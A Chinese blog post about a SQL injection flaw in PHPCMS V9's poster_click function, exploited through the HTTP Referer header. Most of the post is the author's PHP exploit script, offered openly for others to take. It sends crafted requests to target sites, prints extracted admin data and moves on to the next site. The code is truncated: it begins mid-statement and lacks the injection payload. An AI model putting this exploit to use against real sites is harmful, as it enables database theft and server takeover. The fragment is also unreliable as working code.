所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞,可能使黑客利用漏洞篡改网页、窃取数据库,甚至控制服务器。SQL注入漏洞存在于PHPCMS V9版本(包括GBK和UTF8版)的poster_click函数,攻击者可以控制HTTP_REFERER(header的一部分),将REFERER值直接带入数据库,而且不受magic_quotes_gpc()控制,这导致SQL注入漏洞的产生。利用漏洞,攻击者可以构造SQL语句对DEMO网站的MySQL数据库进行查询,并能够实施“拖库”,甚至将数据库所在服务器变为傀儡主机。详细内容请见,http://webscan.360.cn/news/news84
很早就写好的EXP,以前在博客也发过的,不过是加密过的,这次发一个不加密的带注释的吧,这个相对于老的有过优化,主要是执行速度方面,喜欢的拿去,此漏洞官方己补了,请勿使用此EXP干坏事哦。
加密的版本请访问我的旧博客获取。http://back.waitalone.cn/post/PHPCMSV9_POSTER_CLICK.html
' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; } else { echo $i . '-->' . $admin_match[1] . "\n"; } //echo $admin_match[1]. "\n"; //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n"; } } } else { exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n"); } //提交数据包函数 function send_pack($cmd) { global $host, $path; $data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n"; $data .= "Host: " . $host . "\r\n"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $data .= $cmd . "\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Connection: Close\r\n\r\n"; //这里一定要2个\r\n否则将会一直等待并且不返回数据 $fp = @fsockopen($host, 80, $errno, $errstr, 30); //echo ini_get('default_socket_timeout');//默认超时时间为60秒 if (!$fp) { echo $errno . '-->' . $errstr; exit('Could not connect to: ' . $host); } else { fwrite($fp, $data); $back = ''; while (!feof($fp)) { $back .= fread($fp, 1024); } fclose($fp); } return $back; } //时间统计函数 function func_time() { list($microsec, $sec) = explode(' ', microtime()); return $microsec + $sec; } echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。'; ?>
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论